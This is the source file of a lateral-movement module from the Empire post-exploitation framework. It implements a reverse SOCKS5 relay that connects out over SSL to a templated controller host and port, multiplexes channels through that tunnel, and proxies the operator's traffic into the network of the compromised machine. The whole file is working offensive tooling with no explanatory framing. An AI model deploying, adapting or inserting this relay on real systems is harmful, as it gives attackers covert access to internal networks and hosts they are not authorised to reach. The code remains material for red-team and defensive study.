Empire/data/module_source/python/lateral_movement/socks_source.py

438 lines
14 KiB
Python

#from __future__ import unicode_literals, division
import select
import socket
import ssl
import struct
import sys
import threading
class MessageType(object):
Control = 0
Data = 1
OpenChannel = 2
CloseChannel = 3
@classmethod
def validate(cls, arg):
if not isinstance(arg, int) or not MessageType.Control <= arg <= MessageType.CloseChannel:
raise TypeError()
return arg
class Message(object):
HDR_STRUCT = b'!BHI'
HDR_SIZE = struct.calcsize(HDR_STRUCT)
def __init__(self, body, channel_id, msg_type=MessageType.Data):
self.body = body
self._channel_id = channel_id
self.msg_type = msg_type
@property
def channel_id(self):
return self._channel_id
@classmethod
def parse_hdr(cls, data):
msg_type, channel_id, length = struct.unpack(cls.HDR_STRUCT, data[:struct.calcsize(cls.HDR_STRUCT)])
MessageType.validate(msg_type)
return msg_type, channel_id, length
@classmethod
def parse(cls, data):
if len(data) < cls.HDR_SIZE:
raise ValueError()
msg_type, channel_id, length = cls.parse_hdr(data[:cls.HDR_SIZE])
data = data[cls.HDR_SIZE:]
if length != len(data):
raise ValueError()
MessageType.validate(msg_type)
return Message(data, channel_id, msg_type=msg_type)
def serialize(self):
return struct.pack(self.HDR_STRUCT, self.msg_type, self.channel_id, len(self.body)) + self.body
class Channel(object):
def __init__(self, channel_id):
self._channel_id = channel_id
self._client_end, self._tunnel_end = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
self.tx = 0
self.rx = 0
@property
def tunnel_interface(self):
return self._tunnel_end
@property
def client_interface(self):
return self._client_end
@property
def channel_id(self):
return self._channel_id
def fileno(self):
return self._client_end.fileno()
def close(self):
self._client_end.close()
def send(self, data, flags=0):
self._client_end.sendall(data, flags)
self.tx += len(data)
def recv(self, length):
try:
data = self._client_end.recv(length)
except Exception:
data = b''
else:
self.rx += len(data)
return data
class Tunnel(object):
def __init__(self, sock, open_channel_callback=None, close_channel_callback=None):
self.transport = sock
self.transport_lock = threading.Lock()
self.channels = []
self.closed_channels = {}
if open_channel_callback is None:
self.open_channel_callback = lambda x: None
else:
self.open_channel_callback = open_channel_callback
if close_channel_callback is None:
self.close_channel_callback = lambda x: None
else:
self.close_channel_callback = close_channel_callback
self.monitor_thread = threading.Thread(target=self._monitor)
self.monitor_thread.daemon = True
self.monitor_thread.start()
def wait(self):
self.monitor_thread.join()
@property
def channel_id_map(self):
return {x: y for x, y in self.channels}
@property
def id_channel_map(self):
return {y: x for x, y in self.channels}
def _close_channel_remote(self, channel_id):
message = Message(b'', channel_id, msg_type=MessageType.CloseChannel)
self.transport_lock.acquire()
self.transport.sendall(message.serialize())
self.transport_lock.release()
def close_channel(self, channel_id, close_remote=False, exc=False):
if channel_id in self.closed_channels:
if close_remote:
self._close_channel_remote(channel_id)
return
if channel_id not in self.id_channel_map:
if exc:
raise ValueError()
else:
return
channel = self.id_channel_map[channel_id]
try:
self.channels.remove((channel, channel_id))
except ValueError:
return
channel.close()
channel.tunnel_interface.close()
if close_remote:
self._close_channel_remote(channel_id)
self.close_channel_callback(channel)
self.closed_channels[channel_id] = channel
def close_tunnel(self):
for channel, channel_id in self.channels:
self.close_channel(channel_id, close_remote=True)
self.transport.close()
def _open_channel_remote(self, channel_id):
message = Message(b'', channel_id, MessageType.OpenChannel)
self.transport_lock.acquire()
self.transport.sendall(message.serialize())
self.transport_lock.release()
def open_channel(self, channel_id, open_remote=False, exc=False):
if channel_id in self.id_channel_map:
if exc:
raise ValueError()
else:
return self.id_channel_map[channel_id]
channel = Channel(channel_id)
self.channels.append((channel, channel_id))
if open_remote:
self._open_channel_remote(channel_id)
self.open_channel_callback(channel)
return channel
def recv_message(self):
data = b''
while len(data) < Message.HDR_SIZE:
_data = self.transport.recv(Message.HDR_SIZE - len(data))
if not _data:
break
data += _data
if len(data) != Message.HDR_SIZE:
raise ValueError()
msg_type, channel_id, length = Message.parse_hdr(data)
chunks = []
received = 0
while received < length:
_data = self.transport.recv(length - received)
if not _data:
break
chunks.append(_data)
received += len(_data)
if received != length:
raise ValueError()
return Message(b''.join(chunks), channel_id, msg_type)
def _monitor(self):
while True:
ignored_channels = []
read_fds = [channel.tunnel_interface for channel, channel_id in self.channels] + [self.transport]
try:
r, _, _ = select.select(read_fds, [], [], 1)
except Exception:
continue
if not r:
continue
if self.transport in r:
try:
message = self.recv_message()
except ValueError:
sys.exit(1)
if message.msg_type == MessageType.CloseChannel:
self.close_channel(message.channel_id)
ignored_channels.append(message.channel_id)
elif message.msg_type == MessageType.OpenChannel:
self.open_channel(message.channel_id)
elif message.msg_type == MessageType.Data:
channel = self.id_channel_map.get(message.channel_id)
if channel is None:
self.close_channel(message.channel_id, close_remote=True)
else:
try:
channel.tunnel_interface.sendall(message.body)
except OSError as e:
self.close_channel(channel_id=message.channel_id, close_remote=True)
else:
tiface_channel_map = {channel.tunnel_interface: channel for (channel, channel_id) in self.channels}
for tunnel_iface in r:
if tunnel_iface == self.transport:
continue
channel = tiface_channel_map.get(tunnel_iface)
if channel is None or channel.channel_id in ignored_channels:
continue
try:
data = tunnel_iface.recv(4096)
except Exception:
self.close_channel(channel.channel_id, close_remote=True)
continue
if not data:
self.close_channel(channel.channel_id, close_remote=True)
continue
message = Message(data, channel.channel_id, MessageType.Data)
try:
self.transport_lock.acquire()
self.transport.sendall(message.serialize())
self.transport_lock.release()
except:
return
return
def proxy_sock_channel(self, sock, channel, logger):
def close_both():
self.close_channel(channel.channel_id, close_remote=True)
sock.close()
while True:
if (channel, channel.channel_id) not in self.channels:
return
readfds = [channel, sock]
try:
r, _, _ = select.select(readfds, [], [], 1)
except Exception:
return
if not r:
continue
if channel in r:
try:
data = channel.recv(4096)
except Exception:
close_both()
return
else:
if not data:
close_both()
return
try:
sock.sendall(data)
except Exception:
close_both()
return
if sock in r:
try:
data = sock.recv(4096)
except Exception:
close_both()
return
else:
if not data:
close_both()
return
try:
channel.send(data)
except Exception:
close_both()
return
class Socks5Proxy(object):
@staticmethod
def _remote_connect(remote_host, remote_port, sock, af=socket.AF_INET):
remote_socket = socket.socket(af, socket.SOCK_STREAM)
if af == socket.AF_INET:
atyp = 1
local_addr = ('0.0.0.0', 0)
else:
atyp = 4
local_addr = ('::', 0)
try:
remote_socket.connect((remote_host, remote_port))
except Exception:
reply = struct.pack('BBBB', 0x05, 0x05, 0x00, atyp)
else:
local_addr = remote_socket.getsockname()[:2]
reply = struct.pack('BBBB', 0x05, 0x00, 0x00, atyp)
reply += socket.inet_pton(af, local_addr[0]) + struct.pack('!H', local_addr[1])
sock.send(reply)
return remote_socket
@classmethod
def new_connect(cls, sock):
sock.recv(4096)
sock.sendall(struct.pack('BB', 0x05, 0x00))
request_data = sock.recv(4096)
if len(request_data) >= 10:
ver, cmd, rsv, atyp = struct.unpack('BBBB', request_data[:4])
if ver != 0x05 or cmd != 0x01:
sock.sendall(struct.pack('BBBB', 0x05, 0x01, 0x00, 0x00))
sock.close()
raise ValueError()
else:
sock.sendall(struct.pack('BBBB', 0x05, 0x01, 0x00, 0x00))
sock.close()
raise ValueError()
if atyp == 1:
addr_type = socket.AF_INET
addr = socket.inet_ntop(socket.AF_INET, request_data[4:8])
port, = struct.unpack('!H', request_data[8:10])
elif atyp == 3:
addr_type = socket.AF_INET
length, = struct.unpack('B', request_data[4:5])
addr = request_data[5:5 + length].decode()
port, = struct.unpack('!H', request_data[length + 5:length + 5 + 2])
elif atyp == 4:
addr_type = socket.AF_INET6
addr = socket.inet_ntop(socket.AF_INET6, request_data[4:20])
port, = struct.unpack('!H', request_data[20:22])
else:
sock.sendall(struct.pack('BBBB', 0x05, 0x08, 0x00, 0x00))
sock.close()
raise ValueError()
host = (addr, port)
remote_sock = cls._remote_connect(addr, port, sock, af=addr_type)
return remote_sock, host
class Relay(object):
def __init__(self, connect_host, connect_port, no_ssl=False):
self.no_ssl = no_ssl
self.connect_server = (connect_host, connect_port)
self.tunnel = None
self.tunnel_sock = socket.socket()
if not no_ssl:
try:
self.tunnel_sock = ssl.wrap_socket(self.tunnel_sock)
except ssl.SSLError as e:
sys.exit(-1)
def _handle_channel(self, channel):
sock = None
try:
sock, addr = Socks5Proxy.new_connect(channel.client_interface)
except ValueError:
self.tunnel.close_channel(channel.channel_id, close_remote=True)
return
except Exception:
self.tunnel.close_channel(channel.channel_id, close_remote=True)
try:
if isinstance(sock, socket.socket):
sock.close()
except:
pass
return
self.tunnel.proxy_sock_channel(sock, channel, None)
def open_channel_callback(self, channel):
t = threading.Thread(target=self._handle_channel, args=(channel,))
t.daemon = True
t.start()
def run(self):
try:
self.tunnel_sock.connect(self.connect_server)
except Exception:
return
self.tunnel = Tunnel(self.tunnel_sock, open_channel_callback=self.open_channel_callback)
self.tunnel.wait()
relay = Relay('${host}', ${port}, no_ssl=${no_ssl})
relay.run()